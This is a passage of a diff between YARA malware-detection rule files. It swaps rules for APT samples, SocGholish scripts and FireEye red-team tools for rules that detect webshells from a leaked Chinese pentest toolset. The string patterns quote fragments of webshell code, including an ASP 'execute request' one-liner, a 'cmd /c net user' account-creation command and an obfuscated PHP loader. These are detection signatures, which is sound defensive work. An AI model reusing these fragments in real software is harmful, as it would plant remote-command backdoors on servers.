+		id = "72a04950-b82d-516f-a376-5253b7de1158"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L301-L317"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L336-L352"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "950ece29e8fd056e3506684bce9b16eb185d63c1b020e4911972f5fcbdadbe30"
-		score = 75
+		hash = "2f39f1d9846ae72fc673f9166536dc21d8f396aa"
+		logic_hash = "67c542f172fd1b97fbee4697fd42bab9486e3d779ce62993617e5a5205bd75d4"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2b1c1c6d82837dbbccd171a0413c1d761b1f7c3668a21c63ca06143e731f030e"
 
 	strings:
-		$s1 = "[%d] Failed, %08X" fullword ascii
-		$s2 = "woqunimalegebi" fullword ascii
-		$s3 = "[%d] Offset can not fetched." fullword ascii
+		$s0 = "$mysql.=\"insert into `$table`($keys) values($vals);\\r\\n\";" fullword ascii
+		$s2 = "$mysql_link=@mysql_connect($mysql_servername , $mysql_username , $mysql_password" ascii
+		$s16 = "mysql_query(\"SET NAMES gbk\");" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( all of them or pe.imphash ( ) == "c6a4c95d868a3327a62c9c45f5e15bbf" )
+		filesize < 2KB and all of them
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_17 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_JSPMSSQL : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Webshell from CN Honker Pentest Toolset - file JSPMSSQL.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e314a893-1ef5-5d5f-b056-af25765c0b70"
-		date = "2018-06-21"
+		id = "061c1e53-edd0-5838-8d0f-6fb8f4fa078a"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L319-L343"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L354-L369"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0724e07614e704d9ac8a1ae4aecfcf3d9800dde6f83eeecc8427ab6205e321a6"
-		score = 75
+		hash = "c6b4faecd743d151fe0a4634e37c9a5f6533655f"
+		logic_hash = "c08e69345cb09e41840a81dcd8a015f9e1be93d570b64c310be74631e5314e2f"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "05036de73c695f59adf818d3c669c48ce8626139d463b8a7e869d8155e5c0d85"
-		hash2 = "08d8c610e1ec4a02364cb53ba44e3ca5d46e8a177a0ecd50a1ef7b5db252701d"
-		hash3 = "14535607d9a7853f13e8bf63b629e3a19246ed9db6b4d2de2ca85ec7a7bee140"
 
 	strings:
-		$x1 = "c:\\users\\administrator\\desktop\\code\\skeyman2\\" ascii
-		$x2 = "\\SkeyMan2.pdb" ascii
-		$x3 = "\\\\.\\Pnpkb" fullword ascii
-		$s1 = "\\DosDevices\\Pnpkb" wide
-		$s2 = "\\DosDevices\\PnpKb" wide
-		$s3 = "\\Driver\\kbdhid" wide
-		$s4 = "\\Device\\PnpKb" wide
-		$s5 = "Microsoft  Windows Operating System" fullword wide
-		$s6 = "hDevice == INVALID_HANDLE_VALUE" fullword ascii
+		$s1 = "<form action=\"?action=operator&cmd=execute\"" fullword ascii
+		$s2 = "String sql = request.getParameter(\"sqlcmd\");" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and ( 1 of ( $x* ) and 1 of ( $s* ) )
+		filesize < 35KB and all of them
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_18 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Injection_Transit_Jmpost : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Webshell from CN Honker Pentest Toolset - file jmPost.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "20642526-5a4d-5dca-a6f5-29f19a9b5271"
-		date = "2018-06-21"
+		id = "892f747e-6065-5baf-b928-8d69d8792483"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L345-L367"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L371-L386"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5cac313bd77900e67f0528d660671394915dff7159ca6fa067fd9c392d7c269a"
-		score = 75
+		hash = "f80ec26bbdc803786925e8e0450ad7146b2478ff"
+		logic_hash = "6c7f52cf7ff6df9867ea2c46cd8f40ef0e077d4e1d9033cde0649a209bffe21b"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "33029f5364209e05481cfb2a4172c6dc157b0070f51c05dd34485b8e8da6e820"
-		hash2 = "263c01a3b822722dc288a5ac138d953630d8c548a0bee080ae3979b7d364cecb"
-		hash3 = "52d190a8d20b4845551b8765cbd12cfbe04cf23e6812e238e5a5023c34ee9b37"
-		hash4 = "1f019e3c30a02b7b65f7984903af11d561d02b2666cc16463c274a2a0e62145d"
-		hash5 = "43904ea071d4dce62a21c69b8d6efb47bcb24c467c6f6b3a6a6ed6cd2158bfe5"
-		hash6 = "00d9da2b665070d674acdbb7c8f25a01086b7ca39d482d55f08717f7383ee26a"
 
 	strings:
-		$s1 = "Windows 95/98/Me, Windows NT 4.0, Windows 2000/XP: IME PROCESS key" fullword ascii
-		$s2 = "Windows 2000/XP: Either the angle bracket key or the backslash key on the RT 102-key keyboard" fullword ascii
-		$s3 = "LoadLibraryA() failed in KbdGetProcAddressByName()" fullword ascii
-		$s5 = "Unknown Virtual-Key Code" fullword ascii
-		$s6 = "Computer Sleep key" fullword ascii
+		$s1 = "response.write  PostData(JMUrl,JmStr,JmCok,JmRef)" fullword ascii
+		$s2 = "JmdcwName=request(\"jmdcw\")" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		filesize < 9KB and all of them
 }
-rule SIGNATURE_BASE_Seaduke_Sample : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Web_Asp : FILE
 {
 	meta:
-		description = "SeaDuke Malware"
+		description = "Webshell from CN Honker Pentest Toolset - file web.asp.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "011a303b-b051-519f-9687-668c9bcd15ca"
-		date = "2015-07-14"
+		id = "67e03591-770a-5b32-9579-c899894740fc"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/MJ0c2M"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_seaduke_unit42.yar#L10-L28"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L388-L403"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d2e570129a12a47231a1ecb8176fa88a1bf415c51dabd885c513d98b15f75d4e"
-		logic_hash = "3bec2bedaafddd17ee65747f8be773287eda784bdfa8fc11e8378737139ef94e"
+		hash = "aebf6530e89af2ad332062c6aae4a8ca91517c76"
+		logic_hash = "5d2d7e6b9340ee4fd845ff05c99526c919214974b1a0def66492fe3cd4a75fe9"
 		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "bpython27.dll" fullword ascii
-		$s1 = "email.header(" ascii
-		$s2 = "LogonUI.exe" fullword wide
-		$s3 = "Crypto.Cipher.AES(" ascii
-		$s4 = "mod is NULL - %s" fullword ascii
+		$s0 = "<FORM method=post target=_blank>ShellUrl: <INPUT " fullword ascii
+		$s1 = "\" >[Copy code]</a> 4ngr7&nbsp; &nbsp;</td>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them
+		filesize < 13KB and all of them
 }
-rule SIGNATURE_BASE_Mywscript_Compiledscript : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Wshell_Asp : FILE
 {
 	meta:
-		description = "Detects a scripte with default name Mywscript compiled with Script2Exe (can also be a McAfee tool https://community.mcafee.com/docs/DOC-4124)"
+		description = "Webshell from CN Honker Pentest Toolset - file wshell-asp.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a0480a8a-5a7e-5829-851b-7301cfc9da60"
-		date = "2017-07-27"
+		id = "294f0d00-7102-553d-92e2-c0a0e017385c"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mywscript_dropper.yar#L10-L26"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L405-L421"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5619de9589e3d34026bf4ec223f2c6b94fcb7362c8f3c26f7582030cfc4385cf"
-		score = 65
+		hash = "4a0afdf5a45a759c14e99eb5315964368ca53e9c"
+		logic_hash = "f3c4af85e4798d3a809d8edd9cc46d1df44453f14ed050b002fe789da4d6096f"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "515f5188ba6d039b8c38f60d3d868fa9c9726e144f593066490c7c97bf5090c8"
 
 	strings:
-		$x1 = "C:\\Projets\\vbsedit_source\\script2exe\\Release\\mywscript.pdb" fullword ascii
-		$s1 = "mywscript2" fullword wide
-		$s2 = "MYWSCRIPT2" fullword wide
+		$s1 = "file1.Write(\"<%response.clear:execute request(\\\"root\\\"):response.End%>\");" fullword ascii
+		$s2 = "hello word !  " fullword ascii
+		$s3 = "root.asp " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( $x1 or 2 of them )
+		filesize < 5KB and all of them
 }
-rule SIGNATURE_BASE_Flash_CVE_2015_5119_APT3_Leg : CVE_2015_5119 FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Asp404 : FILE
 {
 	meta:
-		description = "Exploit Sample CVE-2015-5119"
+		description = "Webshell from CN Honker Pentest Toolset - file asp404.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d9efaea3-0644-501a-990b-665e257beb86"
-		date = "2015-08-01"
+		id = "4125bb40-3f5c-53f5-b906-54fa77b119f5"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2015_5119.yar#L2-L21"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L423-L439"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "99af6b9ecc18b87b14968eb8fffefac7be10dd727d8af2d0488fae4a96196e85"
+		hash = "bed51971288aeabba6dabbfb80d2843ec0c4ebf6"
+		logic_hash = "c84be2e561a08317be11cdb0fe103f8ad182a64d8cd1bf987163ebbeabe20f00"
 		score = 70
 		quality = 85
-		tags = "CVE-2015-5119, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		yaraexchange = "No distribution without author's consent"
 
 	strings:
-		$s0 = "HT_exploit" fullword ascii
-		$s1 = "HT_Exploit" fullword ascii
-		$s2 = "flash_exploit_" ascii
-		$s3 = "exp1_fla/MainTimeline" ascii fullword
-		$s4 = "exp2_fla/MainTimeline" ascii fullword
-		$s5 = "_shellcode_32" ascii
-		$s6 = "todo: unknown 32-bit target" fullword ascii
+		$s0 = "temp1 = Len(folderspec) - Len(server.MapPath(\"./\")) -1" fullword ascii
+		$s1 = "<form name=\"form1\" method=\"post\" action=\"<%= url%>?action=chklogin\">" fullword ascii
+		$s2 = "<td>&nbsp;<a href=\"<%=tempurl+f1.name%>\" target=\"_blank\"><%=f1.name%></a></t" ascii
 
 	condition:
-		uint16( 0 ) == 0x5746 and 1 of them
+		filesize < 113KB and all of them
 }
-rule SIGNATURE_BASE_MAL_ZIP_Socgholish_Mar21_1 : ZIP JS SOCGHOLISH FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Serv_U_Asp : FILE
 {
 	meta:
-		description = "Triggers on small zip files with typical SocGholish JS files in it"
-		author = "Nils Kuhnert"
-		id = "da35eefd-b34d-59cd-8afc-da9c78ace96e"
-		date = "2021-03-29"
+		description = "Webshell from CN Honker Pentest Toolset - file Serv-U asp.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "06a58a05-92bd-5124-a172-2bfd9491c2fc"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_socgholish.yar#L1-L22"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L441-L457"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4f6566c145be5046b6be6a43c64d0acae38cada5eb49b2f73135b3ac3d6ba770"
-		hash = "54f756fbf8c20c76af7c9f538ff861690800c622d1c9db26eb3afedc50835b09"
-		hash = "dfdbec1846b74238ba3cfb8c7580c64a0fa8b14b6ed2b0e0e951cc6a9202dd8d"
-		logic_hash = "6621b029f65720e468bd167fcd7429a1f7ba8975298ddbd913b13fbe9e117df2"
-		score = 75
-		quality = 35
-		tags = "ZIP, JS, SOCGHOLISH, FILE"
+		hash = "cee91cd462a459d31a95ac08fe80c70d2f9c1611"
+		logic_hash = "c98c3f4db5ea812827b6108ef88b57116621142202248f4f26f0c71bd76e33ec"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = /\.[a-z0-9]{6}\.js/ ascii
-		$a2 = "Chrome" ascii
-		$a3 = "Opera" ascii
-		$b1 = "Firefox.js" ascii
-		$b2 = "Edge.js" ascii
+		$s1 = "newuser = \"-SETUSERSETUP\" & vbCrLf & \"-IP=0.0.0.0\" & vbCrLf & \"-PortNo=\" &" ascii
+		$s2 = "<td><input name=\"c\" type=\"text\" id=\"c\" value=\"cmd /c net user goldsun lov" ascii
+		$s3 = "deldomain = \"-DELETEDOMAIN\" & vbCrLf & \"-IP=0.0.0.0\" & vbCrLf & \" PortNo=\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 1600 and ( 2 of ( $a* ) or any of ( $b* ) )
+		filesize < 30KB and 2 of them
 }
-rule SIGNATURE_BASE_EXT_MAL_JS_Socgholish_Mar21_1 : JS SOCGHOLISH FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Cfm_List : FILE
 {
 	meta:
-		description = "Triggers on SocGholish JS files"
-		author = "Nils Kuhnert"
-		id = "3ed7d2da-569b-5851-a821-4a3cda3e13ce"
-		date = "2021-03-29"
-		modified = "2023-01-02"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_socgholish.yar#L25-L51"
+		description = "Webshell from CN Honker Pentest Toolset - file list.cfm"
+		author = "Florian Roth (Nextron Systems)"
+		id = "98302eef-d1e8-5524-a57e-d49c0e92c7e0"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L459-L474"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7ccbdcde5a9b30f8b2b866a5ca173063dec7bc92034e7cf10e3eebff017f3c23"
-		hash = "f6d738baea6802cbbb3ae63b39bf65fbd641a1f0d2f0c819a8c56f677b97bed1"
-		hash = "c7372ffaf831ad963c0a9348beeaadb5e814ceeb878a0cc7709473343d63a51c"
-		logic_hash = "08218ae952577a6ac936de875236cdc3ae32e3aaccd2196b7f43e80d7e748584"
-		score = 75
+		hash = "85d445b13d2aef1df3b264c9b66d73f0ff345cec"
+		logic_hash = "41c7c5ba6187a8871dec83bcd859b9377813d60cea8ef2b4ad390c67de04e010"
+		score = 70
 		quality = 85
-		tags = "JS, SOCGHOLISH, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "new ActiveXObject('Scripting.FileSystemObject');" ascii
-		$s2 = "['DeleteFile']" ascii
-		$s3 = "['WScript']['ScriptFullName']" ascii
-		$s4 = "['WScript']['Sleep'](1000)" ascii
-		$s5 = "new ActiveXObject('MSXML2.XMLHTTP')" ascii
-		$s6 = "this['eval']" ascii
-		$s7 = "String['fromCharCode']"
-		$s8 = "2), 16)," ascii
-		$s9 = "= 103," ascii
-		$s10 = "'00000000'" ascii
+		$s1 = "<TD><a href=\"javascript:ShowFile('#mydirectory.name#')\">#mydirectory.name#</a>" ascii
+		$s2 = "<TD>#mydirectory.size#</TD>" fullword ascii
 
 	condition:
-		filesize > 3KB and filesize < 5KB and 8 of ( $s* )
+		filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_Socgholish_JS_22_02_2022 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php2 : FILE
 {
 	meta:
-		description = "Detects SocGholish fake update Javascript files 22.02.2022"
-		author = "Wojciech Cieślak"
-		id = "68d2dbb7-0079-527a-92c7-450c3dd953b3"
-		date = "2022-02-22"
+		description = "Webshell from CN Honker Pentest Toolset - file php2.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "377ff89d-a9ba-526c-97a1-388f9ccb48ba"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_socgholish.yar#L53-L72"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L476-L491"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3e14d04da9cc38f371961f6115f37c30"
-		hash = "dffa20158dcc110366f939bd137515c3"
-		hash = "afee3af324951b1840c789540d5c8bff"
-		hash = "c04a1625efec27fb6bbef9c66ca8372b"
-		hash = "d08a2350df5abbd8fd530cff8339373e"
-		logic_hash = "fd529cbb511ff6bcf37b44b835e021b28763922f7726ff67db5cbb3f9193c7ae"
-		score = 75
+		hash = "bf12e1d741075cd1bd324a143ec26c732a241dea"
+		logic_hash = "707e2795d82636fbbc4d9f5324e509a526f77f9ead8f3c4d59dd0e95bc94f11e"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "encodeURIComponent(''+" ascii
-		$s2 = "['open']('POST'," ascii
-		$s3 = "new ActiveXObject('MSXML2.XMLHTTP');" ascii
+		$s1 = "$OOO0O0O00=__FILE__;$OOO000000=urldecode('" ascii
+		$s2 = "<?php // Black" fullword ascii
 
 	condition:
-		filesize < 5KB and all of them
+		filesize < 12KB and all of them
 }
-rule SIGNATURE_BASE_APT_Backdoor_Win_GORAT_3_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Tuoku_Script_Oracle : FILE
 {
 	meta:
-		description = "This rule uses the same logic as FE_APT_Trojan_Win_GORAT_1_FEBeta with the addition of one check, to look for strings that are known to be in the Gorat implant when a certain cleaning script is not run against it."
-		author = "FireEye"
-		id = "94c195b5-b8e8-56a7-bc11-dbbe2f969b06"
-		date = "2020-12-08"
-		modified = "2025-02-12"
-		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_fireeye_redteam_tools.yar#L47-L83"
+		description = "Webshell from CN Honker Pentest Toolset - file oracle.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "adc8dea6-8031-580b-b19a-e5520d41528f"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L493-L509"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "995120b35db9d2f36d7d0ae0bfc9c10d"
-		logic_hash = "4fda951281b3d711e50c24f543b528b93295a119af39245b4bece77f641bbf2b"
-		score = 75
-		quality = 38
+		hash = "fc7043aaac0ee2d860d11f18ddfffbede9d07957"
+		logic_hash = "3ad4207e426ed2f9df0e0bac0e906af437b0774ba2ebb541afbe7e29b395ad63"
+		score = 70
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$dirty1 = "fireeye" ascii nocase wide
-		$dirty2 = "kulinacs" ascii nocase wide
-		$dirty3 = "RedFlare" ascii nocase wide
-		$dirty4 = "gorat" ascii nocase wide
-		$dirty5 = "flare" ascii nocase wide
-		$go1 = "go.buildid" ascii wide
-		$go2 = "Go build" ascii wide
-		$json1 = "json:\"pid\"" ascii wide
-		$json2 = "json:\"key\"" ascii wide
-		$json3 = "json:\"agent_time\"" ascii wide
-		$json4 = "json:\"rid\"" ascii wide
-		$json5 = "json:\"ports\"" ascii wide
-		$json6 = "json:\"agent_platform\"" ascii wide
-		$rat = "rat" ascii wide
-		$str1 = "handleCommand" ascii wide
-		$str2 = "sendBeacon" ascii wide
-		$str3 = "rat.AgentVersion" ascii wide
-		$str4 = "rat.Core" ascii wide
-		$str5 = "rat/log" ascii wide
-		$str6 = "rat/comms" ascii wide
-		$str7 = "rat/modules" ascii wide
-		$str8 = "murica" ascii wide
-		$str9 = "master secret" ascii wide
-		$str10 = "TaskID" ascii wide
-		$str11 = "rat.New" ascii wide
+		$s1 = "String url=\"jdbc:oracle:thin:@localhost:1521:orcl\";" fullword ascii
+		$s2 = "String user=\"oracle_admin\";" fullword ascii
+		$s3 = "String sql=\"SELECT 1,2,3,4,5,6,7,8,9,10 from user_info\";" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and all of ( $go* ) and all of ( $json* ) and all of ( $str* ) and #rat > 1000 and any of ( $dirty* )
+		filesize < 7KB and all of them
 }
-rule SIGNATURE_BASE_Credtheft_MSIL_Adpasshunt_2_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Aspx4 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "FireEye"
-		id = "44ba09c3-ac0a-58e7-b98c-dedcbf208d00"
-		date = "2020-12-08"
-		modified = "2025-02-12"
-		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_fireeye_redteam_tools.yar#L845-L861"
+		description = "Webshell from CN Honker Pentest Toolset - file aspx4.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4a13c809-48f7-54f7-9ce3-10d6d48104fb"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L511-L527"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6efb58cf54d1bb45c057efcfbbd68a93"
-		logic_hash = "a76faa34a1f9cc891aeaa65525c8698e49d5a141854ca0cffb42f06a251bea43"
-		score = 50
+		hash = "200a8f15ffb6e3af31d28c55588003b5025497eb"
+		logic_hash = "0aab8e327b4477cb0b8cd5d4b1e4b52c160180656dad57b0498654da1c8d7a29"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$pdb1 = "\\ADPassHunt\\"
-		$pdb2 = "\\ADPassHunt.pdb"
-		$s1 = "Usage: .\\ADPassHunt.exe"
-		$s2 = "[ADA] Searching for accounts with msSFU30Password attribute"
-		$s3 = "[ADA] Searching for accounts with userpassword attribute"
-		$s4 = "[GPP] Searching for passwords now"
+		$s4 = "File.Delete(cdir.FullName + \"\\\\test\");" fullword ascii
+		$s5 = "start<asp:TextBox ID=\"Fport_TextBox\" runat=\"server\" Text=\"c:\\\" Width=\"60" ascii
+		$s6 = "<div>Code By <a href =\"http://www.hkmjj.com\">Www.hkmjj.Com</a></div>" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( @pdb2 [ 1 ] < @pdb1 [ 1 ] + 50 ) or 2 of ( $s* )
+		filesize < 11KB and all of them
 }
-rule SIGNATURE_BASE_APT_Backdoor_Win_Gorat_Memory_1
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Aspx : FILE
 {
 	meta:
-		description = "Identifies GoRat malware in memory based on strings."
-		author = "FireEye"
-		id = "4fcdd98f-1873-58e1-a9f5-73ee0aa5a69f"
-		date = "2020-12-08"
-		modified = "2025-02-12"
-		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_fireeye_redteam_tools.yar#L1013-L1039"
+		description = "Webshell from CN Honker Pentest Toolset - file aspx.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4a13c809-48f7-54f7-9ce3-10d6d48104fb"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L529-L546"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3b926b5762e13ceec7ac3a61e85c93bb"
-		logic_hash = "bf8d80b7a7d35c1bcb353ff66d10bc95c2e6502043acc6554887465a467cdcf7"
-		score = 75
+		hash = "8378619b2a7d446477946eabaa1e6744dec651c1"
+		logic_hash = "b59684633fd72bd1804a96850a8b358db98c169415b6e65fe3ecfb4d9fde72d0"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$rat1 = "rat/modules/socks.(*HTTPProxyClient).beacon" fullword
-		$rat2 = "rat.(*Core).generateBeacon" fullword
-		$rat3 = "rat.gJitter" fullword
-		$rat4 = "rat/comms.(*protectedChannel).SendCmdResponse" fullword
-		$rat5 = "rat/modules/filemgmt.(*acquire).NewCommandExecution" fullword
